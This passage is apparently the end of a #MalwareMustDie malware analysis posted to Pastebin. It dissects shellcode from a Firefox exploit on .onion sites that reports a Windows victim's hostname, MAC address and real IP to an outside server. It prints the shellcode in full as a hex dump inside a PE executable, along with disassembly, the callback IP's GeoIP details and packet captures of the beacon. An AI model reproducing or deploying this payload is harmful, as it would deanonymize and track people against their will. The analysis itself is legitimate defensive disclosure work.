  479.       |     0x00000357    0000         add [eax], al
  480.       |     0x00000359    0000         add [eax], al
  481.       |     0x0000035b    0000         add [eax], al
  482.       |     0x0000035d    0000         add [eax], al
  483.       |     0x0000035f    0000         add [eax], al
  484.       |     0x00000361    0000         add [eax], al
  485.       `---> 0x00000363    0000         add [eax], al
  486.             0x00000365    0000         add [eax], al
  487.             0x00000367    0000         add [eax], al
  488.             0x00000369    0000         add [eax], al
  489.             0x0000036b    0000         add [eax], al
  490.             0x0000036d    0000         add [eax], al
  491.             0x0000036f    0000         add [eax], al
  492.             0x00000371    0000         add [eax], al
  493.             0x00000373    0000         add [eax], al
  494.             0x00000375    0000         add [eax], al
  495.             0x00000377    0000         add [eax], al
  496.             0x00000379    0000         add [eax], al
  497.             0x0000037b    0000         add [eax], al
  498.             0x0000037d    0000         add [eax], al
  499.             0x0000037f    0000         add [eax], al
  500.             0x00000381    0000         add [eax], al
  501.             0x00000383    0000         add [eax], al
  502.             0x00000385    0000         add [eax], al
  503.             0x00000387    0000         add [eax], al
  504.             0x00000389    0000         add [eax], al
  505.             0x0000038b    0000         add [eax], al
  506.             0x0000038d    0000         add [eax], al
  507.             0x0000038f    0000         add [eax], al
  508.             0x00000391    0000         add [eax], al
  509.             0x00000393    0000         add [eax], al
  510.             0x00000395    0000         add [eax], al
  511.             0x00000397    0000         add [eax], al
  512.             0x00000399    0000         add [eax], al
  513.             0x0000039b    0000         add [eax], al
  514.             0x0000039d    0000         add [eax], al
  515.             0x0000039f    0000         add [eax], al
  516.             0x000003a1    0000         add [eax], al
  517.             0x000003a3    0000         add [eax], al
  518.             0x000003a5    0000         add [eax], al
  519.             0x000003a7    0000         add [eax], al
  520.             0x000003a9    0000         add [eax], al
  521.             0x000003ab    0000         add [eax], al
  522.             0x000003ad    0000         add [eax], al
  523.             0x000003af    0000         add [eax], al
  524.             0x000003b1    0000         add [eax], al
  525.             0x000003b3    0000         add [eax], al
  526.             0x000003b5    0000         add [eax], al
  527.             0x000003b7    0000         add [eax], al
  528.             0x000003b9    0000         add [eax], al
  529.             0x000003bb    90           nop
  530.  
  531. # Explanation & conclusion for payload
  532. The exploit is aiming Firefox, this shellcode is aiming Windows OS only,
  533. and affected to all victims accessing specific .onion sites where the redirection script was implemented.
  534. So the payload is a shellcode. It send callback w/strings(data) for hostname to a specific IP outside of TOR.
  535. During the connection session sending ARP to specific host args which will attached the PC's MAC Address to the packet sent to the destination, the PCAP is the PoC for this.
  536. While the GET request will send the global IP of the infected PC to the remote host. The PC's hostname was grabbed before the send operation was done.
  537.  
  538. # Callback:
  539. The IP address GeoIP:
  540. 65.222.202.54
  541. ASN: 701 / UUNET
  542. Prefix: 65.192.0.0/11
  543. Vienna, Virginia, United States, North America         
  544. 38.9012,-77.2653 Verizon Business
  545. Noted: One of unlisted (N/A)block of eight IP addresses in USA that have no organization listed
  546.  
  547. # Dumping the shellcode into the exe....
  548. # binhex:
  549. 0000   4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00    MZ..............
  550. 0010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  551. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  552. 0030   00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00    ............@...
  553. 0040   50 45 00 00 4C 01 01 00 5D BE 45 45 00 00 00 00    PE..L...].EE....
  554. 0050   00 00 00 00 E0 00 03 01 0B 01 08 00 BC 03 00 00    ................
  555. 0060   00 00 00 00 00 00 00 00 60 01 00 00 60 01 00 00    ........`...`...
  556. 0070   1C 05 00 00 00 00 40 00 01 00 00 00 01 00 00 00    ......@.........
  557. 0080   04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00    ................
  558. 0090   1C 05 00 00 60 01 00 00 00 00 00 00 02 00 00 04    ....`...........
  559. 00A0   00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00    ................
  560. 00B0   00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00    ................
  561. 00C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  562. 00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  563. 00E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  564. 00F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  565. 0100   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  566. 0110   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  567. 0120   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  568. 0130   00 00 00 00 00 00 00 00 2E 74 65 78 74 00 00 00    .........text...
  569. 0140   BC 03 00 00 60 01 00 00 BC 03 00 00 60 01 00 00    ....`.......`...
  570. 0150   00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60    ............ ..`
  571. 0160   60 FC E8 8A 00 00 00 60 89 E5 31 D2 64 8B 52 30    `......`..1.d.R0
  572. 0170   8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31    .R..R..r(..J&1.1
  573. 0180   C0 AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F0 52    ..<a|., .......R
  574. 0190   57 8B 52 10 8B 42 3C 01 D0 8B 40 78 85 C0 74 4A    W.R..B<...@x..tJ
  575. 01A0   01 D0 50 8B 48 18 8B 58 20 01 D3 E3 3C 49 8B 34    ..P.H..X ...<I.4
  576. 01B0   8B 01 D6 31 FF 31 C0 AC C1 CF 0D 01 C7 38 E0 75    ...1.1.......8.u
  577. 01C0   F4 03 7D F8 3B 7D 24 75 E2 58 8B 58 24 01 D3 66    ..}.;}$u.X.X$..f
  578. 01D0   8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24    ..K.X.........D$
  579. 01E0   24 5B 5B 61 59 5A 51 FF E0 58 5F 5A 8B 12 EB 86    $[[aYZQ..X_Z....
  580. 01F0   05 5D 81 BD E9 02 00 00 47 45 54 20 75 70 8D 85    .]......GET up..
  581. 0200   D1 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 74 5E    ....PhLw&.....t^
  582. 0210   8D 85 D8 02 00 00 50 68 4C 77 26 07 FF D5 85 C0    ......PhLw&.....
  583. 0220   74 4C BB 90 01 00 00 29 DC 54 53 68 29 80 6B 00    tL.....).TSh).k.
  584. 0230   FF D5 01 DC 85 C0 75 36 50 50 50 50 40 50 40 50    ......u6PPPP@P@P
  585. 0240   68 EA 0F DF E0 FF D5 31 DB F7 D3 39 C3 74 1F 89    h......1...9.t..
  586. 0250   C3 6A 10 8D B5 E1 02 00 00 56 53 68 99 A5 74 61    .j.......VSh..ta
  587. 0260   FF D5 85 C0 74 1F FE 8D 89 00 00 00 75 E3 80 BD    ....t.......u...
  588. 0270   4F 02 00 00 01 74 07 E8 3B 01 00 00 EB 05 E8 4D    O....t..;......M
  589. 0280   01 00 00 FF E7 B8 00 01 00 00 29 C4 89 E2 52 50    ..........)...RP
  590. 0290   52 68 B6 49 DE 01 FF D5 5F 81 C4 00 01 00 00 85    Rh.I...._.......
  591. 02A0   C0 0F 85 F2 00 00 00 57 E8 F9 00 00 00 5E 89 CA    .......W.....^..
  592. 02B0   8D BD E9 02 00 00 E8 EB 00 00 00 4F 83 FA 20 7C    ...........O.. |
  593. 02C0   05 BA 20 00 00 00 89 D1 56 F3 A4 B9 0D 00 00 00    .. .....V.......
  594. 02D0   8D B5 C4 02 00 00 F3 A4 89 BD 4B 02 00 00 5E 56    ..........K...^V
  595. 02E0   68 A9 28 34 80 FF D5 85 C0 0F 84 AA 00 00 00 66    h.(4...........f
  596. 02F0   8B 48 0A 66 83 F9 04 0F 82 9C 00 00 00 8D 40 0C    .H.f..........@.
  597. 0300   8B 00 8B 08 8B 09 B8 00 01 00 00 50 89 E7 29 C4    ...........P..).
  598. 0310   89 E6 57 56 51 51 68 48 72 D2 B8 FF D5 85 C0 81    ..WVQQhHr.......
  599. 0320   C4 04 01 00 00 0F B7 0F 83 F9 06 72 6C B9 06 00    ...........rl...
  600. 0330   00 00 B8 10 00 00 00 29 C4 89 E7 89 CA D1 E2 50    .......).......P
  601. 0340   52 31 D2 8A 16 88 D0 24 F0 C0 E8 04 3C 09 77 04    R1.....$....<.w.
  602. 0350   04 30 EB 02 04 37 88 07 47 88 D0 24 0F 3C 09 77    .0...7..G..$.<.w
  603. 0360   04 04 30 EB 02 04 37 88 07 47 46 E2 D4 59 29 CF    ..0...7..GF..Y).
  604. 0370   89 FE 58 01 C4 8B BD 4B 02 00 00 F3 A4 C6 85 4F    ..X....K.......O
  605. 0380   02 00 00 01 E8 2E 00 00 00 31 C0 50 51 29 CF 4F    .........1.PQ).O
  606. 0390   57 53 68 C2 EB 38 5F FF D5 53 68 75 6E 4D 61 FF    WSh..8_..ShunMa.
  607. 03A0   D5 E9 C8 FE FF FF 31 C9 F7 D1 31 C0 F2 AE F7 D1    ......1...1.....
  608. 03B0   49 C3 00 00 00 00 00 8D BD E9 02 00 00 E8 E4 FF    I...............
  609. 03C0   FF FF 4F B9 4F 00 00 00 8D B5 75 02 00 00 F3 A4    ..O.O.....u.....
  610. 03D0   8D BD E9 02 00 00 E8 CB FF FF FF C3 0D 0A 43 6F    ..............Co
  611. 03E0   6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61    nnection: keep-a
  612. 03F0   6C 69 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F    live..Accept: */
  613. 0400   2A 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69    *..Accept-Encodi
  614. 0410   6E 67 3A 20 67 7A 69 70 0D 0A 0D 0A 00 83 C7 0E    ng: gzip........
  615. 0420   31 C9 F7 D1 31 C0 F3 AE 4F FF E7 0D 0A 43 6F 6F    1...1...O....Coo
  616. 0430   6B 69 65 3A 20 49 44 3D 77 73 32 5F 33 32 00 49    kie: ID=ws2_32.I
  617. 0440   50 48 4C 50 41 50 49 00 02 00 00 50 41 DE CA 36    PHLPAPI....PA..6
  618. 0450   47 45 54 20 2F 30 35 63 65 61 34 64 65 2D 39 35    GET /05cea4de-95
  619. 0460   31 64 2D 34 30 33 37 2D 62 66 38 66 2D 66 36 39    1d-4037-bf8f-f69
  620. 0470   30 35 35 62 32 37 39 62 62 20 48 54 54 50 2F 31    055b279bb HTTP/1
  621. 0480   2E 31 0D 0A 48 6F 73 74 3A 20 00 00 00 00 00 00    .1..Host: ......
  622. 0490   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  623. 04A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  624. 04B0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  625. 04C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  626. 04D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  627. 04E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  628. 04F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  629. 0500   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  630. 0510   00 00 00 00 00 00 00 00 00 00 00 90                ............
  631.  
  632. # Faiyaaaaaa!!!!
  633. # grab a PCAP:
  634. https://lh4.googleusercontent.com/-0wkNuNmGI7s/U-r58ZI8l3I/AAAAAAAAQec/e7jPTahuyO8/s1152/001.png
  635.  
  636. #headers
  637. 13:55:52.350640 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [S], seq 4027180372, win 65535, options [mss 1460,nop,nop,sackOK], length 0
  638. 13:55:52.350691 IP 65.222.202.54.http > 192.168.0.20.1065: Flags [S.], seq 1594076372, ack 4027180373, win 14600, options [mss 1460,nop,nop,sackOK], length 0
  639. 13:55:52.350916 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [.], ack 1, win 65535, length 0
  640. 13:55:52.432742 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [P.], seq 1:154, ack 1, win 65535, length 153
  641. 13:55:52.432760 IP 65.222.202.54.http > 192.168.0.20.1065: Flags [.], ack 154, win 15544, length 0
  642. 13:55:52.432880 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [F.], seq 154, ack 1, win 65535, length 0
  643. 13:55:52.433010 IP 65.222.202.54.http > 192.168.0.20.1065: Flags [F.], seq 1, ack 155, win 15544, length 0
  644. 13:55:52.433398 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [.], ack 2, win 65535, length 0
  645.  
  646. # sent HTTP data:
  647. 00000000  47 45 54 20 2f 30 35 63  65 61 34 64 65 2d 39 35 GET /05c ea4de-95
  648. 00000010  31 64 2d 34 30 33 37 2d  62 66 38 66 2d 66 36 39 1d-4037- bf8f-f69
  649. 00000020  30 35 35 62 32 37 39 62  62 20 48 54 54 50 2f 31 055b279b b HTTP/1
  650. 00000030  2e 31 0d 0a 48 6f 73 74  3a 20 39 32 31 37 30 32 .1..Host : 921702
  651. 00000040  0d 0a 43 6f 6f 6b 69 65  3a 20 49 44 3d 30 30 32 ..Cookie : ID=002
  652. 00000050  31 38 36 31 39 34 35 37  38 0d 0a 43 6f 6e 6e 65 18619457 8..Conne
  653. 00000060  63 74 69 6f 6e 3a 20 6b  65 65 70 2d 61 6c 69 76 ction: k eep-aliv
  654. 00000070  65 0d 0a 41 63 63 65 70  74 3a 20 2a 2f 2a 0d 0a e..Accep t: */*..
  655. 00000080  41 63 63 65 70 74 2d 45  6e 63 6f 64 69 6e 67 3a Accept-E ncoding:
  656. 00000090  20 67 7a 69 70 0d 0a 0d  0a                       gzip... .
  657.  
  658. #sent Mac Address data:
  659. Source: 192.168.0.20:1065 -> 65.222.202.54:80  
  660. HTTP traffic Header contains sensitive information 00XXXXXXXXXX (macaddr):
  661.  
  662. - check mate -
  663.  
  664. ----
  665. Investigated by:
  666. #MalwareMustDie! The team!
RAW Paste Data
Want to get better at JavaScript?
Learn to code JavaScript in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top